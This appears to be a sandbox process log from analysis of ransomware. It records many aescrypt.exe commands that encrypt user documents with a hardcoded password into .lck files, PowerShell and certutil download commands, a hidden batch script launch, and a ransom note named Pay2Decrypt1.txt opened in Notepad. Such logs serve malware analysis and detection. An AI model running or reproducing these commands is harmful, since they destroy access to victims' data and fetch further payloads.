C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "RestoreEdit.ppsm.lck" "RestoreEdit.ppsm"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1820

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "RequestLimit.mpeg3.lck" "RequestLimit.mpeg3"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2028

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "BackupSubmit.ini.lck" "BackupSubmit.ini"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:216

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "BlockStep.snd.lck" "BlockStep.snd"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:220

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SaveProtect.txt.lck" "SaveProtect.txt"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1192

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DisconnectSync.wax.lck" "DisconnectSync.wax"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1076

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ReceiveSwitch.htm.lck" "ReceiveSwitch.htm"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1940

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "FormatMerge.mpeg3.lck" "FormatMerge.mpeg3"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1080

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "CopyConvert.rar.lck" "CopyConvert.rar"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1368

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "RegisterRead.mpeg.lck" "RegisterRead.mpeg"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:760

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "LockUse.clr.lck" "LockUse.clr"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:228

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "RegisterMount.mhtml.lck" "RegisterMount.mhtml"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1128

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ResolveSwitch.cfg.lck" "ResolveSwitch.cfg"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:912

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ReceiveWrite.reg.lck" "ReceiveWrite.reg"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:344

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "CompletePop.vsd.lck" "CompletePop.vsd"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1476

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "CompleteProtect.mpg.lck" "CompleteProtect.mpg"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:324

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "AssertSkip.wma.lck" "AssertSkip.wma"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1540

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "BackupSet.gif.lck" "BackupSet.gif"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1176

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SelectEdit.xsl.lck" "SelectEdit.xsl"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2040

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /aD /b /oS
3⤵
PID:652

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c (new-object System.Net.WebClient).DownloadFile('','')
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1304

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c Invoke-WebRequest -Uri -OutFile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:988

C:\Windows\system32\certutil.exe
certutil -urlcache -split -f
3⤵
PID:208

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe start-process -FilePath "C:\Windows\System32\cmd.exe" -ArgumentList "/k","call","C:\Users\Admin\AppData\Local\Temp\p2d.bat" -WorkingDirectory "C:\Users\Admin\Desktop" -WindowStyle hidden
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1576

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k call C:\Users\Admin\AppData\Local\Temp\p2d.bat
4⤵
PID:1304

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Pay2Decrypt1.txt
5⤵
- Opens file in notepad (likely ransom note)
PID:2004

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:212

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "desktop.ini.lck" "desktop.ini"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:952

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "These.docx.lck" "These.docx"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:884

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Are.docx.lck" "Are.docx"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1076

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Recently.docx.lck" "Recently.docx"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1928

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Opened.docx.lck" "Opened.docx"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1176

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Files.docx.lck" "Files.docx"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:892

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SwitchOut.mhtml.lck" "SwitchOut.mhtml"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:988

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ShowMount.vsdx.lck" "ShowMount.vsdx"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:584

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ExpandInitialize.dotm.lck" "ExpandInitialize.dotm"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1552

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "RequestSave.vsdm.lck" "RequestSave.vsdm"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:664

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "PublishConnect.vdw.lck" "PublishConnect.vdw"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:296

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "WatchStart.docm.lck" "WatchStart.docm"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1068

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "InvokeSubmit.doc.lck" "InvokeSubmit.doc"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:324

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "FindSet.mhtml.lck" "FindSet.mhtml"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1896

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "OptimizeRevoke.pptx.lck" "OptimizeRevoke.pptx"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1564

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ResolveResize.vsw.lck" "ResolveResize.vsw"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2040

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SaveWatch.vsw.lck" "SaveWatch.vsw"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1572

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ResumeClose.pptx.lck" "ResumeClose.pptx"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:960

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UninstallGet.xls.lck" "UninstallGet.xls"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1952

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "MoveComplete.vdx.lck" "MoveComplete.vdx"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1696

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "CloseRevoke.xls.lck" "CloseRevoke.xls"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1576

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ApproveWrite.vsw.lck" "ApproveWrite.vsw"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1276

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SendRedo.pub.lck" "SendRedo.pub"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1192

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "StepConnect.xlt.lck" "StepConnect.xlt"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1184

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "EditPop.ppt.lck" "EditPop.ppt"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1352

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DisableUnlock.ppsm.lck" "DisableUnlock.ppsm"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1616

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ReceiveAssert.vstm.lck" "ReceiveAssert.vstm"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:232

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ProtectSkip.xls.lck" "ProtectSkip.xls"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:228

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ApproveLimit.vsdx.lck" "ApproveLimit.vsdx"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:816

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UnlockOptimize.htm.lck" "UnlockOptimize.htm"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:584

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SearchInstall.odp.lck" "SearchInstall.odp"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:664

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /aD /b /oS
3⤵
PID:1656

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:1948

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "desktop.ini.lck" "desktop.ini"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1896

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "desktop.ini.lck.lck" "desktop.ini.lck"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1564

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "These.docx.lck" "These.docx"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:216

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Are.docx.lck" "Are.docx"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1572

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Recently.docx.lck" "Recently.docx"
3⤵
PID:1224

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Opened.docx.lck" "Opened.docx"
3⤵
PID:1704

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Files.docx.lck" "Files.docx"
3⤵
PID:760

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "These.docx.lck.lck" "These.docx.lck"
3⤵
PID:1200

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Are.docx.lck.lck" "Are.docx.lck"
3⤵
PID:960

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Recently.docx.lck.lck" "Recently.docx.lck"
3⤵
PID:1576

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Files.docx.lck.lck" "Files.docx.lck"
3⤵
PID:1276

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Opened.docx.lck.lck" "Opened.docx.lck"
3⤵
PID:1192

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SwitchOut.mhtml.lck" "SwitchOut.mhtml"
3⤵
PID:1184

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SwitchOut.mhtml.lck.lck" "SwitchOut.mhtml.lck"
3⤵
PID:1352

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ShowMount.vsdx.lck" "ShowMount.vsdx"
3⤵
PID:1616

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ShowMount.vsdx.lck.lck" "ShowMount.vsdx.lck"
3⤵
PID:232

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ExpandInitialize.dotm.lck" "ExpandInitialize.dotm"
3⤵
PID:228

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ExpandInitialize.dotm.lck.lck" "ExpandInitialize.dotm.lck"
3⤵
PID:540

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "RequestSave.vsdm.lck" "RequestSave.vsdm"
3⤵
PID:988

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "RequestSave.vsdm.lck.lck" "RequestSave.vsdm.lck"
3⤵
PID:224

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "PublishConnect.vdw.lck" "PublishConnect.vdw"
3⤵
PID:1744

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "PublishConnect.vdw.lck.lck" "PublishConnect.vdw.lck"
3⤵
PID:1604

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "WatchStart.docm.lck" "WatchStart.docm"
3⤵
PID:1552

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "WatchStart.docm.lck.lck" "WatchStart.docm.lck"
3⤵
PID:440

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "InvokeSubmit.doc.lck" "InvokeSubmit.doc"
3⤵
PID:664

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "InvokeSubmit.doc.lck.lck" "InvokeSubmit.doc.lck"
3⤵
PID:1656

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "FindSet.mhtml.lck" "FindSet.mhtml"
3⤵
PID:788

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "FindSet.mhtml.lck.lck" "FindSet.mhtml.lck"
3⤵
PID:1540

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "OptimizeRevoke.pptx.lck" "OptimizeRevoke.pptx"
3⤵
PID:236

C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "OptimizeRevoke.pptx.lck.lck" "OptimizeRevoke.pptx.lck"
3⤵
PID:1564

